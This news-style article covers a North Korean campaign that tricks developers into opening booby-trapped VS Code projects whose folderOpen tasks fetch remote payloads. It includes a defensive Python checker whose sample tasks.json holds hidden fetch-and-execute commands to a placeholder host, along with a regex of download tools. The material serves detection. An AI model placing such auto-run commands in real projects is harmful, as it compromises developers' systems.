North Korean Hackers Exploit Visual Studio Code to Infiltrate Developer Systems
In a sophisticated cyber espionage campaign, North Korean state-sponsored hackers have been targeting software developers by leveraging malicious Microsoft Visual Studio Code (VS Code) projects. This tactic is part of the ongoing Contagious Interview campaign, which has been evolving since its initial discovery in December 2025.
The attackers initiate contact with potential victims under the guise of offering job opportunities or collaborative projects. They instruct these individuals to clone a repository from platforms like GitHub, GitLab, or Bitbucket and open the project in VS Code. Unbeknownst to the victims, these repositories are booby-trapped with malicious configurations designed to execute harmful code upon opening.
The core of this attack lies in the manipulation of VS Code’s task configuration files. By setting a task’s runOn option to folderOpen, the attackers ensure that the malicious task executes automatically when the project folder is opened. The triggered task retrieves and runs payloads hosted on Vercel domains, tailored to the operating system of the compromised machine. The primary payloads identified in these attacks are known as BeaverTail and InvisibleFerret, both of which provide the attackers with remote code execution capabilities.
To enhance the resilience of their malware delivery, the threat actors have incorporated multi-stage droppers disguised as benign spell-check dictionaries within the task configuration files. This serves as a fallback, ensuring the deployment of the malicious payload even if the primary method fails. The obfuscated JavaScript embedded in these files executes upon opening the project, establishing communication with a remote server and executing any received JavaScript code. The final stage involves another layer of heavily obfuscated JavaScript, further complicating detection and analysis.
A notable evolution in this campaign is the abuse of VS Code’s Workspace Trust feature. When a developer opens a project, VS Code prompts them to trust the repository’s author. If the developer grants this trust, the application processes the repository’s tasks.json configuration file and executes any commands embedded in it. On macOS systems, this results in the execution of background shell commands that retrieve and run JavaScript payloads, establishing a persistent execution loop that allows the attackers to harvest system information and maintain continuous communication with the compromised host.
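The folderOpen trigger and the tasks.json handling described in the two paragraphs above are what a defender can check for before trusting a cloned workspace. The following added example (not code from the article or from any tool it names) parses a tasks.json file, including the comments VS Code permits, and flags every task that auto-runs on folder open, noting whether it fetches from the network or hides its terminal; the sample file and its URLs are constructed placeholders.

```python
import json
import re

# Constructed sample .vscode/tasks.json (JSONC) in the shape the article describes;
# the URLs are placeholders, not real indicators.
SAMPLE_TASKS_JSON = r'''{
  // one normal build task, one hidden auto-run task with a per-OS override
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build" },
    { "label": "spellcheck", "type": "shell",
      "command": "curl -s https://PLACEHOLDER.invalid/stage1 | node",
      "windows": { "command": "powershell -c iwr https://PLACEHOLDER.invalid/s1" },
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" } }
  ]
}'''

# Fetch-and-execute primitives and bare URLs that a build task rarely needs.
FETCH_RE = re.compile(r"\b(curl|wget|iwr|Invoke-WebRequest|certutil)\b|https?://", re.I)

def strip_jsonc(text):
    """Drop /* */ and whole-line // comments so VS Code's JSONC parses as JSON.
    Inline // is left alone so 'https://' inside strings survives."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    return re.sub(r"^\s*//.*$", "", text, flags=re.M)

def task_commands(task):
    """Collect the command (plus args) of a task and of its windows/osx/linux overrides."""
    cmds = []
    for scope in (task, task.get("windows", {}), task.get("osx", {}), task.get("linux", {})):
        if scope.get("command"):
            cmds.append(" ".join([str(scope["command"])] + [str(a) for a in scope.get("args", [])]))
    return cmds

def find_autorun_tasks(tasks_json_text):
    """Return one finding per task whose runOptions.runOn is "folderOpen"."""
    doc = json.loads(strip_jsonc(tasks_json_text))
    findings = []
    for task in doc.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmds = task_commands(task)
        findings.append({
            "label": task.get("label"),
            "commands": cmds,
            "fetches_remote": any(FETCH_RE.search(c) for c in cmds),
            "hidden": (task.get("presentation") or {}).get("reveal") == "never",
        })
    return findings
```

Run find_autorun_tasks over each .vscode/tasks.json in a freshly cloned repository before clicking "Trust" in the Workspace Trust prompt; any finding with fetches_remote set deserves a manual read of the command before the folder is opened as trusted.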
This campaign underscores the increasing sophistication of North Korean cyber operations and their focus on infiltrating the software development community. By exploiting trusted development tools and platforms, these threat actors can gain access to sensitive information and potentially compromise the supply chain of software products.